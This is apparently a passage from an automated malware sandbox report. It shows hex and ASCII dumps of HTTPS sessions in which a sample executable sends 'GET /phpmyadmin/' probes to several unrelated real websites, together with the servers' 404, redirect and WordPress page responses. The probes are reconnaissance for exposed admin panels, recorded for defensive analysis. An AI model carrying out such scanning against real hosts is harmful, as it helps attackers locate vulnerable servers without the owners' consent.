                                                                                                                                                                                                    Data Ascii: 7d06<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8">...[if IE]><meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'><![endif]--><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><link
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 5f 31 32 30 78 31 32 30 2e 70 6e 67 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 2f 2f 74 72 61 64 65 61 76 65 6e 69 64 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 6f 72 74 6f 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 5f 37 36 78 37 36 2e 70 6e 67 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 35 32 78 31 35 32 22 20 68 72 65 66 3d 22 2f 2f 74 72 61 64 65 61 76 65 6e 69 64 61 2e 63 6f 6d 2f 77 70 2d 63
                                                                                                                                                                                                    Data Ascii: /images/logo/apple-touch-icon_120x120.png"><link rel="apple-touch-icon" sizes="76x76" href="//tradeavenida.com/wp-content/themes/porto/images/logo/apple-touch-icon_76x76.png"><link rel="apple-touch-icon" sizes="152x152" href="//tradeavenida.com/wp-c
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20
                                                                                                                                                                                                    Data Ascii: height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30
                                                                                                                                                                                                    Data Ascii: =new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+60
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 76 61 6c 69 64 61 74 65 2d 65 6e 67 69 6e 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 72 61 64 65 61 76 65 6e 69 64 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 79 73 69 6a 61 2d 6e 65 77 73 6c 65 74 74 65 72 73 2f 63 73 73 2f 76 61 6c 69 64 61 74 69 6f 6e 45 6e 67 69 6e 65 2e 6a 71 75 65 72 79 2e 63 73 73 3f 76 65 72 3d 32 2e 32 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                                                                                                                                                                    Data Ascii: ings);</script><link rel='stylesheet' id='validate-engine-css-css' href='https://tradeavenida.com/wp-content/plugins/wysija-newsletters/css/validationEngine.jquery.css?ver=2.21' media='all' /><style id='wp-emoji-styles-inline-css'>img.wp-smiley, img
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 34 70 78 20 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 34 70 78 20 73 6f 6c 69 64 3b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65
                                                                                                                                                                                                    Data Ascii: ont-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 64 6f 74 73 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 31 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 77 69 64 65 29 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 64 6f 74 73 29 7b 68 65 69 67 68 74 3a 32 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a
                                                                                                                                                                                                    Data Ascii: dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-siz
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 2e 31 31 2e 30 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 79 69 74 68 2d 77 63 61 6e 2d 73 68 6f 72 74 63 6f 64 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 74 69 74 6c 65 73 3a 20 23 34 33 34 33 34 33 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 46 46 46 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 3a 20 23 41 37 31 34 34 43 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 5f 72 3a 20 31 36 37 3b
                                                                                                                                                                                                    Data Ascii: .11.0' media='all' /><style id='yith-wcan-shortcodes-inline-css'>:root{--yith-wcan-filters_colors_titles: #434343;--yith-wcan-filters_colors_background: #FFFFFF;--yith-wcan-filters_colors_accent: #A7144C;--yith-wcan-filters_colors_accent_r: 167;
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 33 2e 39 2e 30 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 79 69 74 68 2d 77 63 77 6c 2d 6d 61 69 6e 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 6c 69 20 61 7b 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 7d 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 6c 69 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 7d 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 61 2e 66 61 63 65 62 6f 6f 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 39 35 39 39 45 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 39 35 39 39 45 3b 7d 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 61 2e 66 61 63 65 62 6f 6f 6b 3a 68 6f 76 65 72 7b 62 61
                                                                                                                                                                                                    Data Ascii: 3.9.0' media='all' /><style id='yith-wcwl-main-inline-css'>.yith-wcwl-share li a{color: #FFFFFF;}.yith-wcwl-share li a:hover{color: #FFFFFF;}.yith-wcwl-share a.facebook{background: #39599E; background-color: #39599E;}.yith-wcwl-share a.facebook:hover{ba


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    24192.168.2.451627109.168.109.2244436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: americanrecords.it
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC187INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:29 GMTServer: ApacheVary: Accept-EncodingContent-Length: 209Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC209INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    25192.168.2.451386120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC182OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC530INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 75 6e 69 64 33 70 34 36 39 73 39 68 6a 32 61 36 70 6b 61 38 73 63 68 32 33 72 3b 20 65 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 36 2d 4e 6f 76 2d 32 30 32 33 20 30 36 3a 35 39 3a 33 30 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 36 30 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 45 78 70 69 72 65 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:30 GMTTransfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=unid3p469s9hj2a6pka8sch23r; expires=Sun, 26-Nov-2023 06:59:30 GMT; Max-Age=3600; path=/; secure; HttpOnlyExpires
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    26192.168.2.45176192.62.143.504436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC171OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: bunasta.eu
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC233INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 75 6e 61 73 74 61 2e 65 75 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:29 GMTServer: Apache/2.4.38 (Debian)Location: http://www.bunasta.eu/phpmyadmin/Content-Length: 318Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC318INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 75 6e 61 73 74 61 2e 65 75 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.bunasta.eu/phpmyadmin/">here</a>.</p><hr><address>Apache/2.4.38 (


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    27192.168.2.452336104.26.12.2454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC745INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, ma
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC624INData Raw: 37 63 62 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c
                                                                                                                                                                                                    Data Ascii: 7cb5<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://hightideinc.com/xmlrpc.php" /><script type="text/javascript">document.documentElement.cl
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC1369INData Raw: 22 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 3b 22 63 6f 6d 70 6c 65 74 65 22 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 62 29 3a 77 69 6e 64 6f 77 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 77 69 6e 64 6f 77 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 62 29 3a 62 28 29 7d 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 65 74 2d 64 69 76 69 2d 75 73 65 72 66 6f 6e 74 73 22 3e 40 66 6f 6e 74
                                                                                                                                                                                                    Data Ascii: "");document.getElementsByTagName("body")[0].appendChild(a)};"complete"!==document.readyState?window.addEventListener?window.addEventListener("load",b):window.attachEvent&&window.attachEvent("onload",b):b()}();</script><style id="et-divi-userfonts">@font
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC1369INData Raw: 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 44 69 76 69 20 76 2e 34 2e 32 33 2e 31 22 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 70 2d
                                                                                                                                                                                                    Data Ascii: ttps://hightideinc.com/feed/" /><link rel="alternate" type="application/rss+xml" title="High Tide Inc. &raquo; Comments Feed" href="https://hightideinc.com/comments/feed/" /><meta content="Divi v.4.23.1" name="generator" /><link rel="stylesheet" id="wp-
